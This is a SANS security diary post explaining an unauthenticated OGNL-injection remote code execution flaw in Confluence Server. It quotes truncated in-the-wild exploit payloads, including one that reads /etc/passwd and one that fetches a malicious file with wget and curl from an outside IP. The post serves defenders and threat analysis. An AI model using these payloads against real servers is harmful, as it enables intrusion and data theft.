Last week, Atlassian patched an unauthenticated remote code execution vulnerability in its Confluence Server and Data Center products. Confluence is a "Wiki" like product used by software development teams to document and organize the software development process. I would expect that most Atlassian customers use the cloud-hosted version of the software managed by Atlassian. But if you are running your own Atlassian server, you had to patch this yourself. Sadly, the vulnerability was discovered after it had already been exploited. The vulnerability was originally discovered by Volexity during incident response [2]. Once the details became known, creating new exploits was made easier due to similar vulnerabilities affecting Atlassian products in the past.

The vulnerability is an OGNL Injection vulnerability. OGNL (Object Graph Navigation Language) is an expression language for Java objects. Simplistically speaking, think of it as SQL injection. But instead of injecting SQL, you are injecting Java code that is being executed.

Here is one of the typical exploits you may be seeing used against Atlassian:

/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%2011762x11762%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.Buffered

Let's URL decode this, and add some line breaks for readability

/${(#_memberAccess["allowStaticMethodAccess"]=true,
#a=@java.lang.Runtime@getRuntime().exec('echo 11762x11762').getInputStream(),
#b=new java.io.InputStreamReader(#a),
#c=new  java.io.Buffered

This would be a typical exploit to detect if a system is vulnerable. If the result of the operation is returned, the system is vulnerable. Here are a few other exploits we currently see:

(URL decoded and only showing the first couple lines)

Retrieving /etc/passwd:

/${(#_memberAccess["allowStaticMethodAccess"]=true,
#a=@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream(),
#b=new java.io.InputStreamReader(#a),
#c=new  java.io.Buffered

Vulnerability scanner at work

/${(
#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("echo vulnerable-status-determined-by-nexpose").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActio

Downloading more (malicious) things

/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("(wget http://209.141.14.137/JavaApache||curl http://209.141.41.137/JavaApache)").getInputStream(),"ut

Of course, this is a critical vulnerability. But it is difficult to guestimate how many vulnerable exposed servers there are. A small sample from Shodan et al. shows some abandoned (or honeypot) servers. But just a couple of exploited servers may be a big deal as this may undermine the affected company's development process and could lead to supply chain-style attacks down the road. If you find an unpatched Confluence server: Assume it to be compromised.

[1] https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
[2] https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|